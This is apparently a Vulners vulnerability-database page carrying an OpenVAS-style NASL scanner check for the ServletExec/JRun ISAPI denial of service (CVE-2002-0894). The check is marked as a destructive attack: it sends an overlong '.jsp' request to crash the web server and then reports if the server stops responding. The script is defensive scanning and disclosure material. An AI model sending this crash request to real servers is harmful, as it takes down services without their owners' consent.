| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| BEA Weblogic Multiple Buffer Overflow Vulnerabilities | 1 Jan 197600:00 | – | coresecurity | |
| CVE-2000-0681 | 13 Oct 200004:00 | – | cve | |
| CVE-2002-0894 | 31 Aug 200204:00 | – | cve | |
| CVE-2000-0681 | 13 Oct 200004:00 | – | cvelist | |
| CVE-2002-0894 | 31 Aug 200204:00 | – | cvelist | |
| EUVD-2002-0885 | 7 Oct 202500:30 | – | euvd | |
| CVE-2000-0681 | 20 Oct 200004:00 | – | nvd | |
| CVE-2002-0894 | 4 Oct 200204:00 | – | nvd | |
| ServletExec 4.1 / JRun ISAPI Multiple DoS | 22 May 200200:00 | – | nessus |
| Source | Link |
|---|---|
| westpoint | www.westpoint.ltd.uk/advisories/wp-02-0006.txt |
| ftp | www.ftp.newatlanta.com/public/4_1/patches/ |
| securityfocus | www.securityfocus.com/bid/1570 |
| securityfocus | www.securityfocus.com/bid/4796 |
| securityfocus | www.securityfocus.com/bid/6122 |
# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10958");
script_version("2023-07-21T05:05:22+0000");
script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_cve_id("CVE-2002-0894", "CVE-2000-0681");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_name("ServletExec 4.1 / JRun ISAPI DoS");
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright("Copyright (C) 2002 Matt Moore");
script_family("Denial of Service");
script_dependencies("gb_get_http_banner.nasl");
script_mandatory_keys("JRun/banner");
script_require_ports("Services/www", 80);
script_exclude_keys("www/too_long_url_crash");
script_xref(name:"URL", value:"https://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/1570");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4796");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/6122");
script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
script_tag(name:"summary", value:"By sending an overly long request for a .jsp file it is
possible to crash the remote web server.
This problem is known as the ServletExec / JRun ISAPI DoS.");
script_tag(name:"solution", value:"Solution for ServletExec:
Download patch #9 from the referenced FTP URL.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("http_func.inc");
include("port_service_func.inc");
port = http_get_port( default:80 );
if( http_is_dead( port:port, retry:1 ) )
exit( 0 );
banner = http_get_remote_headers( port:port );
if( ! banner || "JRun" >!< banner )
exit( 0 );
buf = "/" + crap( 3000 ) + ".jsp";
req = http_get( item:buf, port:port );
res = http_send_recv( port:port, data:req );
if( http_is_dead( port:port ) ) {
security_message( port:port );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation